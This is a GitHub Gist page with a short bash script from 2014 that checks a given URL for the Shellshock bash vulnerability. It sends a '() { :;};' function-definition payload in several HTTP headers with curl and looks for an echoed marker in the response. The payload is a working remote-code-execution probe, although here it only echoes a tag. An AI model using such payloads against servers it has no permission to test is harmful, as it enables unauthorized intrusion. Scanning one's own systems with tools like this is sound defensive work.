Created
September 25, 2014 15:15
-
-
Save panzi/a82cbb7d1e0e2ef50b5e to your computer and use it in GitHub Desktop.
Tool to test if your server is affected by the shellshock vulnerability. Please use it responsibly.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| url="$1" | |
| tag=`uuid` | |
| payload="() { :;};echo;echo $tag;exit" | |
| vulnerable=0 | |
| function shellshock () { | |
| header="$1" | |
| response=`curl --header "$header: $payload" --silent --insecure "$url"` | |
| if [ $PIPESTATUS -ne 0 ]; then | |
| echo "error connecting to $url" >&2 | |
| exit 1 | |
| elif [[ "$response" == *$tag* ]]; then | |
| echo "vulnerable header: $header" | |
| vulnerable=1 | |
| fi | |
| } | |
| for header in Host Cookie User-Agent Referer; do | |
| shellshock "$header" | |
| done | |
| if [ $vulnerable -eq 0 ]; then | |
| echo "server seems to be unaffected" | |
| else | |
| exit 1 | |
| fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment